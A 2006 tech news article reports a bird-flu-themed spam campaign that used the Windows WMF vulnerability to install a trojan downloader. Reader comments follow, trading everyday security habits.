Bird flu e-mail spams WMF trojan

By Derek Sooman on February 7, 2006, 8:01 PM
More trouble is brewing with malware using the WMF vulnerability present in unpatched Windows systems, as security experts are warning of spam emails containing malware that uses social engineering playing on the growing fear of a bird flu epidemic to trick users into visiting a website to run malicious code.

Using the subject "Attention Bird Flu in England", the mail tries to get users to click on a link to go either of two websites to get more information (or rather, to run malware!)

Upon clicking on a link, users are directed to a website which claims that you have been blocked from accessing it. This appears to be another trick by the attacker to make the user believe that the site has either been disabled or shutdown.

Within the HTML, an IFRAME is loaded that uses the recent WMF exploit to run code without user-intervention. The code is a Trojan horse downloader, which connects to another site to download new malicious code. The filename is "expl1.wmf," which downloads and runs "expl1.exe.", Websense Security Labs warned.




User Comments: 8

Got something to say? Post a comment
cyrax said:
Jeez. Its only a real sicko would make light of the situation like that. But i supposed it was inevitable. Thats the sad thing, isn't it?
MonkeyMan said:
This is why you should never click on any ads whatsoever. I think I may have a few of these malware thingys in my system, but I'll just have to run a virus scan, and adware, and it will get rid of them in no time.
Need_a_Dell said:
Why are people so gullible? If someone wants information on something, they should look for it themselves, it should not be offered to them freeliy by an unknown source. These people need to wisen up and get with the program. As agent Mulder once said, "Trust no one". (He probably said it more than once, but you know what I mean!)
blue_dragon said:
you what amazes me...i never get troajns or viruses...its weird..ive never really experienced problems...maybe it cuz i visit windows update every other day..hehe
nathanskywalker said:
[quote] Why are people so gullible? [/quote]The will to be ignorant and have tech support serve them perhaps?Wow, i do believe someone who works at MS said something about that error either being planted, or that someone one the inside has a way to access and exploit it. Whatever the case, when will this stop? This is amazing, hackers are definently taking full adavtage of this. Between this and other recent viruses, good viruse scanners are going to have their hands full.But really, when will people learn to ignore and delete emails from people and addresses they don't know? Or better yet, start the computer in safe run a complete scan for as-ware, spyware, and mal-ware? If the market weren't so easy to break some of the thiefs would go home.
Cartz said:
[b]Originally posted by blue_dragon:[/b][quote]you what amazes me...i never get troajns or viruses...its weird..ive never really experienced problems...maybe it cuz i visit windows update every other day..hehe[/quote]It's actually very easy to keep yourself safe, I rarely even get tracking cookies on my system (I set IE to prompt me before dling 3rd party cookies). I've only once had a virus, WIN98.CIH, and I got that from a friends burned CD that he had given me (mp3s and the original winamp).Unfortunately, it's the people that click the 'GET TEN THOUSAND FREE SMILEYS' popups when they appear, the ones that frequent the less then reputable sites or the ones that open any email attachment that happens to hit their inbox that start the spread of infections. These people are also the ones who don't think that the subscription costs for an AV scanner are worth it, and are too tech-illiterate to known about the free alternatives. The rule of thumb is, if you don't recognize the source, delete the email, regardless of what it contains. If it's important, the person will get in touch with you some other way.
Kaleid said:
[quote]I've only once had a virus, WIN98.CIH, and I got that from a friends burned CD that he had given me (mp3s and the original winamp).[/quote]Ditto, can't remember quite what was in that cd-r though. Since then I've been using anti-virus programs regurarly and for the last couple of years or so also been using adaware and spybot to keep out tracking cookies...
enasni said:
I figure that if you dont have the bird flu and you dont own any birds that are foaming at the mouth than it is pointless to read the e-mail about bird flus. Bird flu isnt a horrible epidemic sweeping the world once over, its just a problematic virus that will be contained soon enough. As for the malware writer who created it................YOU SUCK!
Load all comments...

Add New Comment

TechSpot Members
Login or sign up for free,
it takes about 30 seconds.
You may also...
Get complete access to the TechSpot community. Join thousands of technology enthusiasts that contribute and share knowledge in our forum. Get a private inbox, upload your own photo gallery and more.